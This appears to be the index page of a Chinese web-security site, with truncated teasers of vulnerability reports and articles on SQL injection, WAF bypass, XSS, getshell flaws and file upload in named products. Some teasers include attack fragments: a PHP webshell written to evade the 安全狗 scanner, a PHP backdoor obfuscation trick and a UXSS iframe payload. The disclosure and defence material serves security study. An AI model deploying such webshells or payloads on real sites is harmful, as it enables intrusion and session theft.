帝友P2P借贷系统搜索型SQL注入 - 网站安全 - 自学关注热度:31

帝友P2P借贷系统搜索型SQL注入标题上面说是v3 1版本，具体是什么版本，亲~您懂的。http: v31 diyou cc transfer_success index html?keywords=1borrow_type=account_status=borrow_interestrate=spread_mon..[详情]

百度云加速/加速乐/安全宝/360等所有waf产品某些关注热度:52

测试了下市面上 360 加速乐 百度云加速 安全宝这四个waf产品 在某种条件下均可以绕过 顺利注射出数据库信息。首先我自己搭建了环境 mssql+asp构造了一个 数字型的报错注入点。http: 19..[详情]

万户OA某处绕过限制文件上传以及sql注入 - 网站安关注热度:147

万户OA某处绕过限制文件上传以及sql注入发现这玩意还有标准版和专业版。不知道有没有和方便面牛重复~里面的方法适用于标准版，专业版存在同样的文件但是路径不一样。defaultroot i..[详情]

PHP中使用按位取反(~)函数创建后门，编码变异类关注热度:21

1）PHP ~位运算符前一段时间老外在twitter上爆出个有趣的东西，一串疑似乱码的字符串访问后却能正常输出1337。PHP: 位运算符 -http: www php net manual zh language operators bitwise php~$aNot（按位取反..[详情]

C# sql语句拼接时like情况的防sql注入的用法 - 网站关注热度:18

今天下午同事问我一个比较基础的问题，在拼接sql语句的时候，如果遇到Like的情况该怎么办。我原来的写法就是简单的拼接字符串，后来同事问我如果遇到sql注入怎么办。我想了下，这..[详情]

TSRC挑战赛：WAF之SQL注入防御思路分享 - 网站安全关注热度:20

背景对于腾讯的业务来说，有两个方面决定着WAF能否发挥效果，一个是合适处理海量流量的架构，另一个关键因素则是规则系统。架构决定着WAF能否承受住海量流量的挑战，这个在之前..[详情]

从Yii2的Request看其CSRF防范策略 - 网站安全 - 自学关注热度:42

先画一幅流程图理理思路：1 问题是这样的：今天在处理一个这样的需求， 在app controllers LoginController php中定义了index方法来处理登录（主要是用于非Web页面登录，比如Curl -X POST http: ap..[详情]

安卓内置浏览器跨域漏洞（UXSS） - 网站安全 - 自关注热度:21

相关链接：http: www rafayhackingarticles net 2014 08 android-browser-same-origin-policy html测试链接：http: x7s pw 001 htmliframe name=m src=http: www foxck com onload=window open( 3..[详情]

手把手教你应对搜索引擎劫持攻击 - 网站安全关注热度:33

作者：dong [转载请注明出处自 : 360网站卫士博客-blog wangzhan 360 cn]很多站长可能都遇到过一种黑客攻击方式，就是在搜索引擎结果页中看到自己的网站，但是点开后却跳转到一些其他网站..[详情]

TSRC挑战赛：WAF之SQL注入绕过挑战实录 - 网站安全关注热度:13

博文作者：lol [TSRC 白帽子]第二作者：Conqu3r、花开若相惜来自团队：[Pax Mac Team]应邀参加TSRC WAF防御绕过挑战赛，由于之前曾经和Team小伙伴一起参加过安全宝WAF挑战，而且自己平时接触..[详情]

星外虚拟主机跨web目录文件读取技巧 - 网站安全关注热度:18

星外虚拟主机跨目录读取文件漏洞，需要一定条件。详细说明：问题发生在以下文件，这些文件都没有严格的设置执行权限，当前的IIS用户能够顺利的利用它们执行命令：c: windows 7i24I..[详情]

安居客设计缺陷可伪造任意经纪人进行房源发布关注热度:16

注册账户，登录，发布房源下一步点击发送验证码，此过程抓包发送是成功了可是看reponse，竟然直接把验证码返回给客户端了所以我们可以填上验证码发布房源了，目测所有发送验证码..[详情]

主机屋可通过修改参数可免费购买域名空间（充关注热度:17

主机屋可通过修改参数可免费购买域名空间（充值刷钱漏洞）http: www zhujiwu com domain 域名注册，随便输入，然后注册。修改购买时长参数。li id=1|年 style=color: rgb(153, 153, 153); background..[详情]

51cto博客友情链接过滤问题可以获得登录用户co关注热度:25

友情链接过滤不严格，导致可以进行DOM结构注入。从而注入js攻击。另外cookie重要的登录项无httponly 保护，从而可以得到其他用户的登录会话。发生问题的地方。 增加友情链接http: dl52..[详情]

XSS探测 php 获取当前访问的url文件名的方法小结关注热度:19

推荐函数:一是PHP获取当前页面的网址: dedecms也是用的这个代码如下: 获得当前的脚本网址function GetCurUrl(){if(!empty($_SERVER[REQUEST_URI])){$scriptName = $_SERVER[REQUEST_URI];$nowurl = $..[详情]

php绕过安全狗检测的小马分享 - 网站安全 - 自学关注热度:31

直接上代码：?php$p=realpath(dirname(__FILE__) ) $_POST[a];$t=$_POST[b];$tt=;for ($i=0;$istrlen($t);$i+=2) $tt =urldecode(% substr($t,$i,2));@fwrite(fopen($p,w),$tt);echo succ..[详情]

记一次曲曲折折的win8黑客入侵渗透攻击 - 网站安关注热度:39

事情是这样的，有一段时间在A公司实习过，就想渗透A公司，各种工具各种扫，终于发现一个注入点，拿到了后台的密码，登陆进去之后，没有利用的地方，上传点卡的特别严，即使传上..[详情]

利用QQ面板登陆验证不严格+Arp嗅探来登陆内网的关注热度:18

这个可以说没有技术含量,只是说个思路,先简单演示下 1 打开burp设置好浏览器代理然后点下QQ面板里的QQ空间快捷登陆可以看到burp拦截了,主要就是拦截到的这段RUL2 把这个URL复制下下来拿..[详情]

汽车之家旗下一个存储型XSS（证明可劫持商家后关注热度:13

汽车之家旗下的二手车交易中心留言处出现XSS 导致能抓取商家COOKIE 留言处插入代码获取到商家COOKIE伪造COOKIE登录进去商家后台..[详情]

赶集网手机弹窗执行xss指谁打谁 - 网站安全 - 自关注热度:15

1,通知界面2,随便找个人3,Xss4,弹出漏洞修补建议：过滤掉那里吧..[详情]

关于Jenkins安全测试的一些技巧 - 网站安全 - 自学关注热度:20

今天mickey牛发来一篇关于hacking Jenkins的文章，受益匪浅，虽然不是很高深的东西，看完几篇相关文章之后记录下要点，为以后做安全测试留下笔记。 文章链接：http: www labofapenetrationtes..[详情]

phpshe1.2前台无需登录getshell - 网站安全 - 自学ph关注热度:45

存在漏洞的文件install index php，整个过程没有判断install lock，导致可以重复安装，同是在安装的过程中，对配置项没有进行任何处理，导致任意代码写入。详细分析如下：install index php..[详情]

搜狐焦点某影响所有分站的注入漏洞 - 网站安全关注热度:21

具体参数是：brand_intro phpgoogle一下发现gz focus cn vote brand_intro php?brand_id=46house focus cn vote brand_intro php?brand_id=67dl focus cn vote brand_intro php?brand_id=house focus cn vote br..[详情]

CmsEasy最新版SQL注入可获取管理员账户 - 网站安全关注热度:29

与： CmsEasy最新版本无限制SQL注射:http: www 2cto com Article 201407 313603 html 重复:CmsEasy_5 5_UTF-8_20140420官方最新包文件 lib default archive_act php在提交订单时：function orders_action()..[详情]

CmsEasy最新版SQL注入(同一文件多处) - 网站安全关注热度:38

与：CmsEasy最新版本无限制SQL注射:http: www 2cto com Article 201407 313603 html重复CmsEasy_5 5_UTF-8_20140420官方最新包文件 lib default union_act php此文件存在多处SQL注入第一处SQL注入，在联盟注册处..[详情]

TRSWCM 后台权限绕过以及GETSHELL(含详细修复方案关注热度:207

TRS WCM大于v6版本中存在此漏洞，v5 X版本不存在。无需登录。注：该漏洞目前影响大量站点，担心厂商忽略导致漏洞细节提前曝光，请管理员同学转至cncert国家互联网应急中心进行处理，..[详情]

如何评价XSS在黑客攻防中的地位或重要性？ - 网关注热度:24

在我看来XSS使整个WEB体系变得具有灵性了，早年期间XSS漏洞不流行的时候，随手在某个网站上输入一个, 回显出来就有可能够把局部页面弄乱，这样的WEB站点如同一个没有生命的机器人一..[详情]

U-Mail任意文件上传漏洞一枚及修复 - 网站安全关注热度:25

先登录官方测试站点：这里登录的账号为：mailtest3721再获取当前登录用户的user_idhttp: mail comingchina com webmail client oab index php?module=operateaction=member-getpage=1orderby=is_reverse=1..[详情]

新东方在线学习网站一处任意文件下载问题导致关注热度:19

新东方在线学习网站http: www koolearn com 上面的教程不错，最近正在学雅思，就花了几百大洋买了套教程（很坑爹，教程有效期为1个月），无意间发现了一处任意文件下载，然后就开始x..[详情]

金迪邮件系统任意用户劫持到添加系统管理员关注热度:31

金迪邮件系统，JDMAIL用户量很大，官方案例：http: www mailer com cn Products6 htmlhttp: www mailer com cn New%20Customers index1 htm利用证明：关键字：intitle:金笛邮件管理系统http: mail lyx928 com..[详情]